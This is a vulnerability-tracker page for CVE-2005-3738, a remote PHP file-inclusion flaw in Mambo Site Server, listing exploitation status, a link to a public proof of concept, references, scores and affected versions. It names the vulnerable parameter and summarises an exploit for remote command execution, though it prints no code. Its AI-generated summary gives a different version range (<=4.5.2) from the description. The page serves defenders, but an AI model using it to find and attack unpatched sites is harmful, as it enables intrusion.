CVE-2005-3738

EXPLOITED

Mambo Site Server <= 4.0.14 - Remote PHP File Inclusion via mosConfig_absolute_path Parameter

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2005-3738 has been observed exploited in the wild (reported by VulnCheck KEV). EIP tracks 1 public exploit from researchers including rgod.

AI-analyzed exploit summary This exploit targets a global variable overwrite vulnerability in Mambo CMS <= 4.5.2, allowing remote command execution. It provides a web interface to input target details and execute arbitrary commands.

Description

globals.php in Mambo Site Server 4.0.14 and earlier, when register_globals is disabled, allows remote attackers to overwrite variables in the GLOBALS array and conduct various attacks, as demonstrated using the mosConfig_absolute_path parameter to content.html.php for remote PHP file inclusion.

Exploits (1)

exploitdb WORKING POC VERIFIED
by rgod · phpwebappsphp
https://www.exploit-db.com/exploits/1337

This exploit targets a global variable overwrite vulnerability in Mambo CMS <= 4.5.2, allowing remote command execution. It provides a web interface to input target details and execute arbitrary commands.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Mambo CMS <= 4.5.2
No auth needed
Prerequisites: Target must be running Mambo CMS <= 4.5.2 · PHP must be installed on the attacker's machine
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (9)

Core 9
Core References
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/426942/100/0/threaded
Third Party Advisory, VDB Entry vdb-entry x_refsource_bid
http://www.securityfocus.com/bid/15461
Third Party Advisory third-party-advisory x_refsource_secunia
http://secunia.com/advisories/17622
Various Sources x_refsource_confirm
http://forum.mamboserver.com/showthread.php?t=66154
Third Party Advisory, VDB Entry vdb-entry x_refsource_sectrack
http://securitytracker.com/id?1015258
Exploit, Vendor Advisory mailing-list x_refsource_fulldisc
http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0520.html
Third Party Advisory, VDB Entry mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/427196/100/0/threaded
Exploit mailing-list x_refsource_bugtraq
http://www.securityfocus.com/archive/1/417215
Third Party Advisory vdb-entry x_refsource_vupen
http://www.vupen.com/english/advisories/2005/2473

Scores

EPSS 0.0549
EPSS Percentile 90.5%

Details

VulnCheck KEV 2005-11-22
Status published
Products (10)
mambo/mambo_site_server 4.0
mambo/mambo_site_server 4.0.10
mambo/mambo_site_server 4.0.11
mambo/mambo_site_server 4.0.12
mambo/mambo_site_server 4.0.12_beta
mambo/mambo_site_server 4.0.12_beta_2
mambo/mambo_site_server 4.0.12_rc1
mambo/mambo_site_server 4.0.12_rc2
mambo/mambo_site_server 4.0.12_rc3
mambo/mambo_site_server 4.0.14
Published Nov 22, 2005
Tracked Since Feb 18, 2026